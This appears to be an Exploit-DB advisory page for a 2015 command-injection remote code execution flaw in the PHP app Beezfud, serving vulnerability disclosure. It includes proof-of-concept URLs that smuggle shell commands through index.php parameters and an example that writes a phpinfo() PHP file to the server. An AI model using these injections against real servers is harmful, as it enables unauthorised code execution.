Beezfud Remote Code Execution

vendor:

Beezfud

by:

Ashiyane Digital Security Team

9,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Beezfud

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Beezfud Remote Code Execution

A remote code execution vulnerability exists in Beezfud due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent the execution of malicious code.

Source

Exploit-DB raw data:

================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================